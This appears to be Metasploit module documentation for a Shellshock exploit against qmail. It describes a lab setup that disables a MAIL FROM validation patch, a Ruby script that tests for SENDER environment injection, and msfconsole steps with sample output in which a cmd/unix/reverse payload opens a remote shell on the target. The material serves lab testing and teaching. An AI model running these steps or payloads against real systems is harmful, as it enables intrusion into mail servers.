## Vulnerable Application
Any qmail version (confirmed on the latest releases, qmail-1.03 and netqmail-1.06) running on a system whose bash is vulnerable to Shellshock (CVE-2014-6271). qmail-local places the envelope sender (the MAIL FROM value) into the `SENDER` environment variable before invoking `/bin/sh` for delivery, so two conditions must hold for code execution: `/bin/sh` must actually be bash (the default on many distributions, but not on Debian or Ubuntu, where `/bin/sh` is dash), and the RCPT TO field must name a recipient that qmail delivers to locally (usually something like admin@exampledomain.com). The exploit does not work against the "qmailrocks" community version, which validates the MAIL FROM field and rejects the malformed address.
## Setting up a vulnerable environment
Install qmail on a Linux server whose bash is vulnerable to Shellshock. Ensure that `/bin/sh` is linked to bash (on Debian it points to dash by default, so relink it). Create an e-mail account on that qmail server. IMPORTANT: the "qmailrocks" community version (http://qmailrocks.thibs.com/) applies a patch that validates the MAIL FROM parameter, and with that patch applied it is NOT vulnerable. If you are using this version, edit the `int mfcheck()` function in qmail-smtpd.c so that it always returns 0 (after applying the patch) and recompile qmail-smtpd.
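A local preflight check for the prerequisites named above, as an added example that is not part of the module or of qmail. It assumes it is run on the freshly built qmail host (any user will do) and that `/bin/sh` exists: it resolves what `/bin/sh` really is, then reproduces the vulnerable step directly by spawning the shell with a function definition in the `SENDER` environment variable (where qmail-local puts the envelope sender) and watching whether the trailing command executes.

```ruby
# preflight_qmail_shellshock.rb
# Added example, not part of the Metasploit module or qmail. Run it on the
# lab host to confirm the two conditions the exploit needs before pointing
# the module at it.
require 'open3'

# Resolve /bin/sh through any symlink chain (e.g. /bin/sh -> /bin/bash,
# or /bin/sh -> dash on Debian, which is NOT exploitable this way).
# Returns nil when the path does not exist.
def sh_target(path = '/bin/sh')
  File.realpath(path)
rescue SystemCallError
  nil
end

# True when /bin/sh ultimately resolves to a file named "bash".
def sh_is_bash?(path = '/bin/sh')
  target = sh_target(path)
  !target.nil? && File.basename(target) == 'bash'
end

# Model what qmail-local does: spawn the shell with an attacker-controlled
# environment variable (the envelope sender ends up in SENDER). On a
# Shellshock-vulnerable bash the command after the function body runs at
# startup, before the shell ever looks at its -c argument. The marker is
# constructed here so we can distinguish the injected output from noise.
def env_injection?(shell: '/bin/sh', var: 'SENDER')
  marker = "shellshock-#{Process.pid}"
  env = { var => "() { :;}; echo #{marker}" }
  out, _status = Open3.capture2(env, shell, '-c', ':')
  out.include?(marker)
rescue SystemCallError
  false # shell binary missing or not executable
end

if __FILE__ == $0
  puts "/bin/sh -> #{sh_target || '(missing)'}  (bash? #{sh_is_bash?})"
  puts "shell honours function import from SENDER: #{env_injection?}"
  if sh_is_bash? && env_injection?
    puts 'host meets both conditions; the module should work against it'
  else
    puts 'not exploitable as-is: relink /bin/sh to bash and/or install an unpatched bash'
  end
end
```

On a patched bash or on dash the second line reports `false`, which is exactly what you will see on a modern distribution until you deliberately install a vulnerable bash for the lab.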
## Verification Steps
1. `use exploit/unix/smtp/qmail_bash_env_exec`
2. `set RHOST <target IP>`
3. `set MAILTO <valid e-mail recipient>`
4. `set payload cmd/unix/reverse`
5. `set LHOST <local IP>`
6. Optionally set `RPORT` and `LPORT`
7. `exploit`
8. **Verify** that a new shell session is started
## Options
**MAILTO**
A recipient that the target's qmail actually delivers to locally. The injected MAIL FROM value is only evaluated by a shell at delivery time, so a non-existent mailbox may never trigger the payload. Usually admin@targetdomain.com exists and can be used.
## Sample Output
**Tested on qmail-1.03 on Debian 6.0.6 (squeeze). BASH version 4.1.5(1).**
```
msf > use exploit/unix/smtp/qmail_bash_env_exec
msf exploit(qmail_bash_env_exec) > set rhost 192.168.1.113
rhost => 192.168.1.113
msf exploit(qmail_bash_env_exec) > set mailto "admin@testqmail2.test"
mailto => admin@testqmail2.test
msf exploit(qmail_bash_env_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(qmail_bash_env_exec) > show options

Module options (exploit/unix/smtp/qmail_bash_env_exec):

   Name    Current Setting        Required  Description
   ----    ---------------        --------  -----------
   MAILTO  admin@testqmail2.test  yes       TO address of the e-mail
   RHOST   192.168.1.113          yes       The target address
   RPORT   25                     yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.102    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(qmail_bash_env_exec) > run

[*] Started reverse TCP double handler on 192.168.1.102:4444
[*] 192.168.1.113:25 - Sending the payload...
[*] 192.168.1.113:25 - Sending RCPT TO admin@testqmail2.test
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RvZfov9i2ZuveLXA;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "RvZfov9i2ZuveLXA\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 19 opened (192.168.1.102:4444 -> 192.168.1.113:48167) at 2017-05-04 15:11:02 +0200

whoami
vpopmail
```